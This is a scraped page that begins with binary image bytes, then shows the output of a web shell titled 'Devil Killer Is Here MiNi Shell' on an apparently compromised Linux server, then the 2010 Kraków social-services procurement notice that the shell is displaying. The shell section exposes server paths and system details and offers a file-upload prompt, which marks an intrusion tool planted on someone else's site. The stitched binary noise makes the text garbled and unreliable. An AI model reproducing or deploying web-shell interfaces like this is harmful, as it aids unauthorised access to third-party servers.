JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/268618-N-2010.html

<p class="kh_header"><b>Kraków: Świadczenie usług związanych z realizacją projektu Pora na aktywność,</b><br>
<b>Numer ogłoszenia: 268618 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z realizacją projektu Pora na aktywność,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1. Część I zamówienia 
CPV: 85312320-8
1)	Świadczenie usług doradcy zawodowego w ramach projektu Pora na aktywność, dla co najmniej 75 uczestników Punktów Aktywności Lokalnej (PAL). W tym celu doradca zawodowy: 
a)	realizuje wsparcie indywidualne i grupowe,
b)	prowadzi indywidualne doradztwo zawodowe,
c)	diagnozuje potencjał osób poszukujących pracy przy użyciu standardowych metod testowych,
d)	udziela pomocy w zakresie wyboru zawodu lub kierunku kształcenia, mając na uwadze ich sytuacje społeczną oraz wykształcenie, doświadczenie i orientacje zawodową,
e)	kształtuje umiejętności poszukiwania i pozyskiwania pracy a także  utrzymania zatrudnienia,
f)	udziela pomocy w przygotowaniu dokumentów potrzebnych przy rekrutacji,
g)	diagnozuje zapotrzebowania  na informacje edukacyjne i zawodowe oraz je aktualizuje,
h)	organizuje  i prowadzi warsztaty  oraz zajęcia grupowe z zakresu reintegracji zawodowej,
i)	przygotowuje materiały niezbędne do prowadzenia  warsztatów.
Doradca zawodowy zobowiązany jest,  zgodnie z otrzymanym miesięcznym harmonogramem pracy, do prowadzenia  karty uczestników PAL. Miesięczny  harmonogram pracy będzie zatwierdzany przez Animatora Lokalnego. 
2)	Miejsce świadczenia usługi (adresy placówek): Kraków, ul. Dobrego Pasterza 72; Kraków, ul. Semperitowców 13; Kraków, ul. Sołtysowska 13; Kraków, ul. Sikorki 15; Kraków, ul. Powstańców Wielkopolskich 3.
3)	Okres świadczenia usługi: w dni powszednie od poniedziałku  do piątku  w godzinach od 10:00 do 18:00  w okresie od dnia podpisania umowy do 20 grudnia 2012 roku.
4)	Przewidywana liczba godzin zajęć: 746 godzin, w tym: 282 godziny zajęć indywidualnych i 464 godziny zajęć grupowych.
5)	Przyjmuje się miesięczny okres rozliczeniowy, 
6)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez Kierownika Filii, w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

2. Część II zamówienia:
CPV: 79111000-5
1)	Świadczenie usług pomocy prawnej w ramach projektu Pora na aktywność dla co najmniej 75 uczestników Punktów Aktywności Lokalnej (PAL):
a)	świadczenie pomocy prawnej udzielanie porad prawnych, opinii prawnych, opracowywanie projektów pism w indywidualnych sprawach uczestników PAL,
b)	prowadzenie szkoleń z zakresu aspektów prawnych podczas zajęć warsztatowych,
c)	poradnictwo prawne dla społeczności lokalnej (opracowanie treści porozumienia dla partnerstwa lokalnego, udział w debatach społecznych, ocena pod względem prawnym petycji mieszkańców, etc.),
d)	analiza prawna dokumentacji projektu,
e)	współpraca z pracownikami projektu w zakresie wykonywanych zadań, prowadzenie obowiązującej dokumentacji,
f)	informowanie pracowników o zmianach stanu prawnego i o przewidywanych skutkach tych zmian,
g)	wykonywaniem innych czynności zleconych przez animatora lokalnego w ramach wykonywanej usługi.
Osoba świadcząca pomoc prawną zobowiązana jest, zgodnie z otrzymanym miesięcznym harmonogramem pracy, do prowadzenia karty uczestników PAL. Miesięczny  harmonogram pracy będzie zatwierdzany przez Animatora Lokalnego. 
2)	Miejsce świadczenia usługi (adresy placówek): Kraków, ul. Dobrego Pasterza 72; Kraków, ul. Semperitowców 13; Kraków, ul. Sołtysowska 13; Kraków, ul. Sikorki 15; Kraków, ul. Powstańców Wielkopolskich 3.
3)	Okres świadczenia usługi: w dni powszednie od poniedziałku  do piątku  w godzinach od 10:00 do 18:00 w okresie od dnia podpisania umowy do 20 grudnia 2012 roku.
4)	Przewidywana liczba godzin zajęć: 699 godzin, w tym: 514 godzin zajęć indywidualnych i 185 godzin zajęć grupowych.
5)	Przyjmuje się miesięczny okres rozliczeniowy, 
6)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez Kierownika Filii, w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

3. Część III zamówienia
CPV: 80340000-9

1)	Świadczenie usług pedagoga w ramach projektu Pora na aktywność dla co najmniej 30 uczestników Punktów Aktywności Lokalnej (PAL),( w tym 12 dzieci w wieku od 6 m-ca do 3 roku życia). Zakres zadań wykonywanych w ramach usługi:
a.	organizowanie i przeprowadzenie zajęć edukacyjnych (w formie warsztatów) z zakresu doboru właściwych metod wychowawczych - rozwiązywanie konfliktów rodzinnych, stosowanie nagród i kar w wychowaniu, organizowanie czasu wolnego rodziny, problem kar i nagród w wychowaniu, błędy wychowawcze. 
b.	organizowanie i przeprowadzenie zajęć dla dzieci w wieku do 3 lat - z udziałem rodzica -w oparciu o m.in.: zabawy fundamentalne, pedagogikę Marii Montessori, koncepcję 8 inteligencji Gardnera, metodę W. Sherborne, dziecięce masażyki, gesty dla niemowląt, pedagogikę zabawy, zabawy paluszkowe i inne metody wspierające rozwój dzieci. 
Osoba świadcząca usługi pedagoga zobowiązana jest, zgodnie z otrzymanym miesięcznym harmonogramem pracy, do prowadzenia karty uczestników PAL. Miesięczny harmonogram pracy będzie zatwierdzany przez Animatora Lokalnego.
2)	Miejsce świadczenia usługi (adres placówki): Kraków ul. Semperitowców 13.
3)	 Okres świadczenia usługi: w dni powszednie pomiędzy poniedziałkiem a czwartkiem w godzinach od 10.00 do 18.00 w okresie od dnia podpisania umowy do 20 grudnia 2012 roku. Usługa będzie świadczona po 6 godzin w każdym roku w miesiącach październik - grudzień.
4)	 Przewidywana liczba godzin usługi: 18 godzin
5)	Przyjmuje się miesięczny okres rozliczania. 
6)	Wypłata wynagrodzenia wystąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez Kierownika Filii w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

4. Część IV zamówienia
CPV: 85312320-8

1)	Świadczenie usług doradcy zawodowego dla uczestników projektu Pora na aktywność obejmujących:
a)	przeprowadzenie wywiadu wstępnego,
b)	przygotowanie dokumentów aplikacyjnych (CV, list motywacyjny), 
c)	przygotowanie do rozmowy o pracę lub jej omówienie,
d)	autoprezentacja, prezentację sposobów aktywnego poszukiwania pracy, 
e)	a także w zależności od sytuacji i deklarowanej lub zdiagnozowanej potrzeby klienta pomoc w wyborze odpowiedniego zawodu, budowanie ścieżki rozwoju zawodowego, prezentację możliwości dokształcania zawodowego, opiniowanie o możliwych do realizacji kursach zawodowych. 
f)	Doradca uwzględnia sytuację życiową klienta, jego możliwości psychofizyczne, potrzeby rynku pracy i możliwości systemu edukacyjnego. Realizator usługi wykorzystuje w tym celu swoją wiedzę o zawodach, rynku pracy, umiejętności stosowania technik przekazywania wiedzy i pracy z klientem. 
Doradca zawodowy zobowiązany jest,  zgodnie z otrzymanym miesięcznym harmonogramem pracy, do prowadzenia  karty Wykonawcy. Miesięczny  harmonogram pracy będzie zatwierdzany przez Kierownika Sekcji ds. Zarządzania Projektami. 
2)	Miejsce świadczenia usługi: w zasobach lokalowych Zamawiającego znajdujących się na terenie Krakowa.
3)	Usługa będzie realizowana w oparciu o comiesięczny harmonogram przedstawiany przez Zamawiającego, zatwierdzony przez Kierownika Sekcji ds. Zarządzania Projektami, rozliczana na podstawie kart realizacji usługi i wystawionego na ich podstawie rachunku/faktury częściowej. Harmonogram będzie ustalany na podstawie zgłoszeń klientów na poszczególne terminy realizacji usługi zaproponowane przez Wykonawcę. Zamawiający dopuszcza możliwość modyfikacji harmonogramu w przypadku dodatkowych zgłoszeń klientów lub niezależnej od wykonawcy, nieobecności klientów. Jeżeli Wykonawca zostanie poinformowany e-mailem, faksem lub pisemnie o rezygnacji klienta z usługi (pojedynczego spotkania w ramach usługi) do 24 godzin przed jej rozpoczęciem, Zamawiający nie wypłaca wynagrodzenia za gotowość do świadczenia usługi. Okresem rozliczeniowym będzie miesiąc kalendarzowy. Karta realizacji usługi będzie wypełniana w trakcie usługi (poszczególnych spotkań) przez doradcę, potwierdzana przez klienta; po realizacji usługi oryginał karty zostanie w SP (ul. Dąbrowskiego 24) a Wykonawca otrzyma jej kopię potwierdzoną przez pracownika SP. 

4)	Okres świadczenia usługi w dni powszednie od poniedziałku do piątku w godz. od 08.00 do 20.00, w okresie od dnia podpisania umowy do 31.12.2010r.
5)	Przewidywana liczba godzin zajęć: 200 godzin zegarowych, 
6)	Przyjmuje się miesięczny okres rozliczania. 
7)	Wypłata wynagrodzenia wystąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez Kierownika Filii w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

5.  V część zamówienia.
CPV: 80400000-8
1) Przeprowadzenie usługi superwizji programów aktywności lokalnej i superwizji indywidualnych programów usamodzielnienia w ramach projektu Pora na aktywność, według następujących wytycznych: 
a)	usługą zostaną objęci pracownicy socjalni realizujący: 
-  programy aktywności lokalnej dla ogółu mieszkańców Krakowa - 1 grupa 56 godzin 
-  program aktywności społecznej i zawodowej osób niepełnosprawnych  - 3 grupy x 56 godzin = 186 godzin usługi.
- indywidualne programy usamodzielnienia - 1 grupa 56 godzin 
b)	jedna grupa superwizyjna będzie liczyć nie więcej niż 12 pracowników,
c)	Superwizja będzie się odbywać co 2 tygodnie od dnia podpisania umowy.
d)	 Liczba godzin superwizji: 298 godzin w tym po 2 spotkania edukacyjne dla każdej grupy zwiększające wiedzę oraz umiejętności pracownika w zakresie przygotowywania oraz wdrażania programu aktywności lokalnej obejmujące następujące tematy:
	Metody pogłębiania diagnozy w trakcie realizacji PAL, 
	Promocja programu w społeczności lokalnej
	Metody budowania aktywności społeczności lokalnej,
	Działania sytuacjach trudnych - wygórowane, niejasne oczekiwania, konflikty, techniki radzenia sobie z emocjami grup nieformalnych, nieformalni przywódcy niechętni działaniom, przeciążenia, wycofywanie się partnerów, rezygnacja uczestników.  
	Metody monitoringu i ewaluacji wewnętrznej
	Wykorzystywanie bieżącego monitoringu i ewaluacji wewnętrznej w korygowaniu zaplanowanych działań. 
Spotkania edukacyjne powinny odbywać się nie krócej niż 6 godzin zegarowych; pierwsze w pierwszym możliwym terminie, drugie w połowie cyklu spotkań przewidzianych na rok 2010 wg harmonogramu przygotowanego i uzgodnionego z wykonawcą przez Sekcję ds. Zarządzania Projektami.
Pozostałe spotkania superwizyjne odbywać się będą w wymiarze 4 godzin zegarowych jednorazowo co 2 tygodnie dla wszystkich grup pracowników.
2)	Zakres wykonywanej superwizji: 
Zajęcia będą ukierunkowane na aktywizowanie animatorów, tak by stali się świadomi swoich umiejętności i w ten sposób udoskonalili swój warsztat pracy. Superwizje będą prowadzone na bazie własnych doświadczeń uczestników w oparciu o metody aktywizujące z zastosowaniem technik audiowizualnych. Zajęcia odbywać się będą w oparciu o zindywidualizowane podejście (praca w oparciu o konkretny przypadek). Uczestnicy będą doskonalić swoje umiejętności:
Grupa I - Program Aktywności Lokalnej 
- pracy z grupą, planowania pracy z beneficjentami, dokonywania oceny pracy z klientem, wykorzystywania dostępnych narzędzi wpływu na klienta 
- organizowania środowiska lokalnego, w tym w pracy ze społecznościami lokalnymi oraz grupami zagrożonymi społecznym wykluczeniem badanie zasobów i potrzeb, budowania koalicji lokalnych, inicjowania grup obywatelskich, samopomocowych i edukacyjnych, pracy z i poprzez wolontariuszy, organizowania lokalnych akcji i wydarzeń.
Grupa II Program Integracji Społecznej i Zawodowej Osób Niepełnosprawnych 
- pracy z grupą, planowania pracy z beneficjentami, dokonywania oceny pracy z klientem, wykorzystywania dostępnych narzędzi wpływu na klienta 
- Techniki przeciwdziałania bierności osób niepełnosprawnych, etyka w pomaganiu i pracy z osobą niepełnosprawną
Grupa III Indywidualny Plan Usamodzielnienia
- pracy z grupą, planowania pracy z beneficjentami, dokonywania oceny pracy z klientem, wykorzystywania dostępnych narzędzi wpływu na klienta 
- techniki podtrzymywania zaangażowania młodzieży dysfunkcyjnej, rozmowy monitorujące w pracy z wychowankiem
Ponadto wszyscy uczestnicy grup I-III będą wzmacniać swoje kluczowe kompetencje osobiste i społeczne w zakresie: 
budowania relacji, aktywnego słuchania, udzielania informacji zwrotnej, towarzyszenia, wspierania oraz analizowania, 
tworzenia przestrzeni dla refleksji w pracy z uczestnikami,
udzielania pomocy w zakresie poszukiwania dróg rozwiązań problemów związanych z PAL.
2)	Miejsce świadczenia usługi (adres placówki): ul. Dąbrowskiego 24, Kraków.
3)	 Dni świadczenia usługi: od poniedziałku do piątku w godzinach od 8 do 15.30 w okresie od dnia podpisania umowy do 30 listopada 2010 roku
4)	Przewidywana liczba godzin usługi: 298 godzin
5)	Rozliczenie usługi: zgodnie z otrzymanym miesięcznym harmonogramem pracy, prowadzenie  list obecności uczestników superwizji. Wykonanie harmonogramu zostanie potwierdzone przez pracownika Sekcji ds. Zarządzania Projektami.
6)	Wypłata wynagrodzenia wystąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez Kierownika Sekcji ds. Zarządzania Projektami w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.
6. VI część zamówienia.
CPV: 79111000-5
1)	Świadczenie usług poradnictwa prawnego dla 200 beneficjentów projektu Małopolska Strefa Aktywizacji i Zatrudnienia.
a)	udzielanie porad indywidualnych beneficjentom projektu Małopolska Strefa Aktywizacji i Zatrudnienia,
b)	współpraca z liderem projektu,
c)	współpraca z innymi specjalistami,
d)	prowadzenie dokumentacji wymaganej w projekcie,
2)	Miejsce świadczenia usługi (adresy placówek):  lokal Zamawiającego w Krakowie, ul. Malborska 65,
3)	Okres świadczenia usługi w dni powszednie: od poniedziałku  do piątku  w godzinach od 08:00 do 16:00                    
4)	Przewidywana liczba godzin świadczenia usługi: 590 godzin.
5)	Rozliczenie usługi: zgodnie z otrzymanym miesięcznym harmonogramem dyżurów, wpis do planu działania uczestnika, ewidencja udzielonych porad z własnoręcznym podpisem beneficjenta.
6)	Sposób rozliczenia realizowanej usługi: rozliczenie miesięczne.
7)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez koordynatora projektu w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.


7. VII część zamówienia
CPV: 85121270-6

1)	Świadczenie indywidualnych porad psychologicznych dla 200 beneficjentów projektu Małopolska Strefa Aktywizacji i Zatrudnienia, w tym:
a)	udzielanie  indywidualnych porad psychologicznych beneficjentom projektu ,
b)	pomoc w rozwiązywaniu problemów społecznych osób bezrobotnych,
c)	współpraca z liderem projektu,
d)	współpraca z innymi specjalistami,
e)	prowadzenie dokumentacji wymaganej w projekcie,
2)	Miejsce świadczenia usługi: lokal Zamawiającego w Krakowie, ul. Malborska 65,
3)	Okres świadczenia usługi: w dni powszednie od poniedziałku  do piątku  w godzinach od 08:00 do 16:00                    
4)	Przewidywana liczba godzin świadczenia usługi: 590 godzin.
5)	Rozliczenie usługi: zgodnie z otrzymanym miesięcznym harmonogramem dyżurów, wpis do planu działania uczestnika, ewidencja udzielonych porad z własnoręcznym podpisem beneficjenta.
6)	Sposób rozliczenia realizowanej usługi: rozliczenie miesięczne.
7)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez koordynatora projektu w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

8. VIII część zamówienia.
CPV: 80310000-0
1)	Przeprowadzenie zajęć wyrównujących braki edukacyjne w formie indywidualnych korepetycji dla grupy 10 osób w ramach realizacji projektu Mowa - rozmowa - porozumienie. Jak żyć z nastolatkiem według następujących wytycznych.
a)	Wykonawca zapewni  przeprowadzenie zajęć edukacyjnych z następujących przedmiotów: matematyka, fizyka, chemia, j, polski oraz j. angielski na poziomie gimnazjum i szkoły ponad gimnazjalnej
b)	zajęcia powinny uwzględniać indywidualne potrzeby każdego dziecka, 
2)	Miejsce świadczenia usługi: zasoby lokalowe Wykonawcy lub miejsce zamieszkania rodzin zastępczych
3)	Termin realizacji: od dnia podpisania umowy do 31 grudnia 2010r.                    
4)	Przewidywana liczba godzin świadczenia usługi: 250 godzin.
5)	Rozliczenie usługi: zgodnie z otrzymanym miesięcznym harmonogramem dyżurów, 
6)	Sposób rozliczenia realizowanej usługi: rozliczenie miesięczne.
7)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez koordynatora projektu w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

9. IX część zamówienia
CPV: 80500000-9
1)	Prowadzenie grup wsparcia dla uczestników projektu Program pracy z rodziną wieloproblemową według poniższych wytycznych:
a)	 Wykonawca poprowadzi dwie grupy wsparcia. W każdej grupie wsparcia uczestniczyć będzie maksymalnie 12 osób, łączna maksymalna liczba osób objętych wsparciem - 24
b)	Liczba spotkań dla danej grupy: 8 
c)	Łączna liczba godzin: 32 godziny
d)	Celem spotkań grup wsparcia będzie wymiana doświadczeń oraz wspólne poszukiwanie rozwiązań w obszarze  wypełniania funkcji rodzicielskich, rozwiązywania trudności opiekuńczo - wychowawczych
2)	Miejsce świadczenia usługi (adresy placówek): zasoby lokalowe MOPS w Krakowie
3)	Termin realizacji usługi: od dnia podpisania umowy do 15 listopada 2010r.
4)	Rozliczenie za realizację usługi (po jej wykonaniu). 
5)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku potwierdzonego przez koordynatora projektu w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy.

10. X część zamówienia
CPV: 85121270-6

1)	Świadczenie usług poradnictwa psychologicznego dla co najmniej 140 beneficjentów projektu Streetwork - skuteczny kontakt, zgodnie z poniższymi wytycznymi:
a)	prowadzenie indywidualnego poradnictwa psychologicznego w siedzibie Projektu, w terenie przy współpracy i uzgodnieniu z pracownikami zespołu, w domach beneficjentów,
b)	prowadzenie grupowych form wsparcia,
c)	diagnozowanie sytuacji uczestników projektu i ich otoczenia,
d)	współpraca z pracownikami projektu w zakresie wykonywanych zadań,
e)	prowadzenie obowiązującej dokumentacji,
f)	 wykonywanie innych czynności zleconych przez animatora lokalnego w ramach wykonywanej usługi.
2)	Miejsce świadczenia usługi (adres placówki): Kraków, ul. Beskidzka 30 A oraz praca w terenie na obszarze dzielnic: IV (Prądnik Biały), XI (Wola Duchacka) oraz XII (Prokocim - Bieżanów) Gminy Miejskiej Kraków w tym także w domach beneficjentów ostatecznych projektu; 
3)	Okres świadczenia usługi w dni powszednie: od poniedziałku  do piątku  w godzinach od 11:00 do 19:00  w okresie od dnia podpisania umowy do 31 grudnia 2011 roku.
4)	Przewidywana liczba godzin poradnictwa: 415 godzin, 
5)	Przyjmuje się miesięczny okres rozliczeniowy, 
6)	Wypłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę rachunku częściowego potwierdzonego przez kierownika projektu oraz miesięcznej karty czasu pracy za przepracowany miesiąc, w terminie 14 dni od daty przyjęcia rachunku przez Zamawiającego, przelewem na wskazany rachunek bankowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia,</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 79.11.10.00-5, 80.34.00.00-9, 80.40.00.00-8, 85.12.12.70-6, 80.31.00.00-0, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają odpowiednie kwalifikacje i doświadczenie zawodowe tj.: 
1)	posiadają wykształcenie: 
a)	w zakresie I i IV części zamówienia: ukończone studia na kierunku psychologia, pedagogika, socjologia, studia podyplomowe na kierunku doradca zawodowy,
b)	w zakresie II i VI części zamówienia: ukończone studia na kierunku prawo,
c)	w zakresie III części zamówienia: ukończone studia na kierunku pedagogika.
d)	w zakresie V części zamówienia: wykształcenie wyższe i certyfikat superwizora oraz studium lub studia podyplomowe z zakresu animacji społeczności lokalnych lub równoważne.
e)	w zakresie VII i X części zamówienia: ukończone studia na kierunku psychologia,
f)	w zakresie VIII części zamówienia: wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne,
g)	w zakresie IX części zamówienia: wykształcenie wyższe na kierunku psychologia lub pedagogika,
2)	wykonali minimum: 
a)	50 godzin świadczenia usług doradcy zawodowego - w zakresie I i IV części zamówienia,
b)	100 godzin świadczenia usług poradnictwa prawnego - w zakresie II i VI części zamówienia,
c)	30 godzin doświadczenia w prowadzeniu zajęć dla dzieci do 3 lat (z udziałem rodzica) w oparciu o m. in. zabawy fundamentalne, pedagogikę Marii Montessori, koncepcję 8 inteligencji Gardnera, metodę W. Sherborne, dziecięce masażyki, gesty dla niemowląt, pedagogikę zabawy, zabawy paluszkowe i inne metody wspierające rozwój dzieci - w zakresie III części zamówienia,
d)	świadczona usługa superwizji min 3 programów aktywności lokalnej - w zakresie V części zamówienia,
e)	100 godzin świadczenia usługi poradnictwa psychologicznego - w zakresie VII części zamówienia,
f)	40 godzin świadczenia usługi korepetycji - w zakresie VIII części zamówienia,
g)	500 godzin świadczenia usługi pracy z rodzinami oraz 100 godzin prowadzenia grup wsparcia - w zakresie IX części zamówienia
